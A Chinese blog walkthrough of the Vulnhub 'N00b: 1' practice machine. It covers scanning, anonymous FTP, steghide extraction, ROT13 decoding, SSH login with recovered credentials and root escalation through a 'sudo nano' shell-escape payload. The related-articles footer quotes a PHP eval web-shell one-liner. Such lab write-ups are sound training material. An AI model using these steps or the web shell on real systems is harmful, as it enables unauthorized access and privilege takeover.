首页 > 其他分享 >Vulnhub 靶场 N00b: 1

Vulnhub 靶场 N00b: 1

时间:2024-12-24 20:31:34浏览次数:8  
标签:ftp 00 21 -- cred Vulnhub 靶场 txt N00b

先下载靶机

靶机地址:https://www.vulnhub.com/entry/noob-1,746/

收集信息

1.发现靶机IP

首先查看kaili的IP

靶机要和kali在同一模式下(NAT)

靶机ip

 arp-scan --interface=eth0 --localnet  

这里也是找到了IP

2.端口扫描 

nmap -sS -sV -T4 -A -p- 192.168.239.9 

有21 80 55077的ssh服务端口

信息分析

1.分析端口

尝试在这个几个端口里获取信息

21端口 

匿名访问

  • 匿名 FTP 登录是允许的(FTP代码230)。
  • 匿名用户可以访问到两个文件:
    • cred.txt (21字节,2021年9月21日创建)
    • welcome (86字节,2021年6月11日创建

我们匿名登录FTP 

用户名:anonymous or ftp

密码:随便输入一个邮箱格式的字符串 or anonymous@example.com

┌──(root㉿kali)-[~]                                                                                                                                                     
└─# ftp 192.168.239.9
Connected to 192.168.239.9.
220 (vsFTPd 3.0.3)
Name (192.168.239.9:root): anonymous
331 Please specify the password.
Password:

这里就是将两个文件下载下来

ftp> ls
229 Entering Extended Passive Mode (|||31254|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              21 Sep 21  2021 cred.txt
-rw-r--r--    1 0        0              86 Jun 11  2021 welcome
226 Directory send OK.
ftp> get cred.txt
local: cred.txt remote: cred.txt
229 Entering Extended Passive Mode (|||39331|)
150 Opening BINARY mode data connection for cred.txt (21 bytes).
100% |***************************************************************************************************************************|    21       24.64 KiB/s    00:00 ETA 
226 Transfer complete.
21 bytes received in 00:00 (15.07 KiB/s)
ftp> get welcome
local: welcome remote: welcome
229 Entering Extended Passive Mode (|||28604|)
150 Opening BINARY mode data connection for welcome (86 bytes).
100% |***************************************************************************************************************************|    86      415.76 KiB/s    00:00 ETA 
226 Transfer complete.
86 bytes received in 00:00 (157.86 KiB/s)
ftp> exit
221 Goodbye.

查看文件内容

将这个解码:

champ:password

80端口 发现登页面

可以用上述得到的密码

发现是可以登录上的

这里我用wappalyzer 看一下网站信息

再看看网站有其他的信息

发现 点击About us 会下载一个文件

解压得到三个东西

两张图片的格式不同 总感觉这里面藏了些什么

这里我用  steghide工具 发现了 user.txt 

这里的密码我用的是sudo

用steghide extract -sf funny.bmp来提取隐藏的文件user.txt

 steghide extract -sf funny.bmp  

得到一串字符

同理funny,jpg 也有隐藏的文件但是不需要密码 ,这里是一段提醒

这不是一个 Python 文件,但你却在围绕它打转。
好吧,也试着旋转一些单词吧。

这里回想到我们上面得到的字符串 ;我们试试解密

jgs:guvf bar vf n fvzcyr bar

解密得

wtf:this one is a simple one

搞到这里忽然没有头绪了,但回头看还有一个端口是ssh的 尝试一下

ssh wtf@192.168.239.9 -p 55077

密码是:this one is a simple one

在wtf用户下也是顺利的找到了第一个falg

VGhlIGZsYWcgaXMgdGhlIGVuY29kZWQgc3RyaW5nIGl0c2VsZg

base64解得:

The flag is the encoded string itsel    还有其他的flag

在Documents文件下找到了 backup.sh 脚本 找到了一个用户名和密码

USER=n00b
#aw3s0m3p@$$w0rd

登录到n00b 

真服了,怎么还骂人呢

提权

这里提示可以用nano

查看nano可以使用二进制以超级用户运行sudo

  1. sudo nano
  2. ctrl+r ,Ctrl+x
  3. 输入       reset; sh 1>&0 2>&0

按回车即可

完成!!!祝你好运!!!!

标签:ftp,00,21,--,cred,Vulnhub,靶场,txt,N00b
From: https://blog.csdn.net/weixin_53974661/article/details/144670274

相关文章

  • Vnlhun靶场Log4j2漏洞
    相关概念log4j2是Apache的⼀个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞漏洞原理简单说就是当你使⽤log4j2中提供的⽅法去输出⽇志信息时,⽐如说最常⻅的:Stringa="变量输⼊"JNDI注入介绍JNDI,中⽂名叫j......
  • xml靶场实战
    实战一:http://172.16.0.87获得c:/flag/flag进入网站,随便输入一个账号和密码在burpsuite中拦截请求,并构建xml声明,从而得到结果实战二:把xxe靶场压缩包下载到电脑,ovf文件双击导入虚拟机,即可安装成功,然后扫描网段发现靶机ip,apache默认页面即为靶机地址。获得最终的flag安装虚......
  • 文件解析漏洞靶场实战
    1.IIS6.X安装windows2003和IIS6.X环境,进入inetpub/wwwroot目录下,创建一个.asp后缀的文件创建一个后缀为.jpg的文件,写入一句话,显示当前时间查看IP地址,在浏览器访问.jpg文件2.IIS7.X开启IIS7.X,并修改php.ini里面的配置文件修改windows系统中的IIS服务,并重启PHPstudy......
  • niushop开源商城靶场------漏洞检测攻略
    一,搭建靶场把安装包放到小p的根目录里打开小皮的apache和MySQL服务打开浏览器访问http://127.0.0.1/bachangone/niushop-master/安装靶场二,访问首页、安装完会有跳转,可以直接打开首页和后台http://127.0.0.1/bachangone/niushop-master/index.php打开之后先注册一个......
  • niushop开源商城靶场漏洞
    文件上传漏洞先注册一个账号来到个人信息修改个人头像选择我们的马#一句话(不想麻烦的选择一句话也可以)<?php@eval($_POST["cmd"]);?>#生成h.php文件<?phpfputs(fopen('h.php','w'),'<?php@eval($_POST["cmd"]);?>');?>在BP中进行抓包,改为1.php......
  • upload-labs靶场通关攻略
    第一关在靶场文件夹中新建一个uoload文件夹创建一个木马文件上传,提示文件类型错误在浏览器页面按F12,点击箭头找到上传框的代码,删掉returncheckFile再次上传找到木马的地址链接蚁剑进入连接,成功第二关需要把木马文件改为jpg,利用抓包工具抓包jpg改为php放行......
  • DC-1靶场渗透过程详解
    主机发现与端口扫描打开DC-1,确认与主机在同一网段,查看mac地址查看DC-1靶机ip地址sudoarp-scan-l  扫描具体端口信息sudonmap-A-p--sS-sC-T4192.168.100.129端口信息22/tcpopensshOpenSSH6.0p1Debian4+deb7u7(protocol2.0)80/tcpopenhttpApache......
  • 【SCA-Goat靶场】一款包含大量安全缺陷的SAC应用程序靶场环境
    关于SCA-GoatSCA-Goat是一款软件组合分析(SCA)应用程序,同时它也一个包含大量安全缺陷的SAC应用程序靶场环境。该工具专注于开发代码中使用的易受攻击和被攻陷的JAR依赖项,为用户提供亲身实践的学习机会,以了解潜在的攻击场景。SCA-Goat旨在帮助广大研究人员识别易受攻击的JA......
  • 第四届“鹏城杯”联邦网络靶场协同攻防演练(初赛)WriteUp
    miscSimplesteganography解压出来一个png修复宽高出1半flag。hint.txt用ntfs流导出一张png图片。从里面拆出一个jpg。arnold置乱解码一次得到flag另一半。取证dump出桌面的base.zip。爆破解压得到base64码表u3=LEnoG9HX2fJPVyIUpjax+8CSqsBOYWmzekwA1Z5grM0F/6DTNhQb......
  • dvwa靶场学习—1、VMware16虚拟机安装win10系统
    参考:https://blog.csdn.net/u013097500/article/details/130922242?ops_request_misc=%257B%2522request%255Fid%2522%253A%25229f57538a8985bd22b94ddc3c4206a75e%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=9f57538a8985bd22b94ddc3c4......